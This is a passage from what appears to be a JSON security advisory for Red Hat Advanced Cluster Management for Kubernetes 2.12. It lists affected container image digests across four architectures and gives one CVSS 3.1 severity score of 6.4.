"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
